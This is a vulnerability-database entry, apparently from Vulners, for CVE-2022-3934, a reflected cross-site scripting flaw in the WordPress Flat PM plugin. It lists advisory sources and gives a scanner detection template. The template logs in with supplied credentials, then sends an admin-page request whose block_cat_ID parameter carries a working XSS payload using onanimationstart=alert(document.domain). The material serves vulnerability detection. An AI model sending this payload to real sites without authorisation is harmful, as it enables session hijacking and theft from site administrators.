| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| The vulnerability of the Flat PM Plugin plugin in the WordPress content management system, which exists due to the lack of measures taken to protect the website’s structure, allows attackers to carry out cross-site scripting attacks. | 15 Dec 202300:00 | – | bdu_fstec | |
| CVE-2022-3934 | 12 Dec 202220:21 | – | circl | |
| WordPress plugin Flat PM 跨站脚本漏洞 | 12 Dec 202200:00 | – | cnnvd | |
| CVE-2022-3934 | 12 Dec 202217:54 | – | cve | |
| CVE-2022-3934 Flat PM < 3.0.13 - Reflected Cross-Site Scripting | 12 Dec 202217:54 | – | cvelist | |
| CVE-2022-3934 | 12 Dec 202218:15 | – | nvd | |
| Cross site scripting | 12 Dec 202218:15 | – | prion | |
| PT-2022-7179 · WordPress · Flatpm | 12 Dec 202200:00 | – | ptsecurity | |
| CVE-2022-3934 | 22 May 202523:21 | – | redhatcve | |
| CVE-2022-3934 Flat PM < 3.0.13 - Reflected Cross-Site Scripting | 12 Dec 202217:54 | – | vulnrichment |
id: CVE-2022-3934
info:
name: WordPress FlatPM <3.0.13 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: Fixed in version 3.0.13.
reference:
- https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a
- https://nvd.nist.gov/vuln/detail/CVE-2022-3934
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/ARPSyndicate/cvemon
- https://github.com/cyllective/CVEs
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-3934
cwe-id: CWE-79
epss-score: 0.00869
epss-percentile: 0.54313
cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: mehanoid
product: flat_pm
framework: wordpress
tags: cve2022,cve,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 10s
GET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")'
condition: and
# digest: 490a0046304402201bebcdd4a8ba8569b446dd6ea46768119442f4238d444640cdd0ac4c0d7608e7022077cb339e5c23c3fc928331f292656aca0948161b57f0a160a8a06105b6cf7cc5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation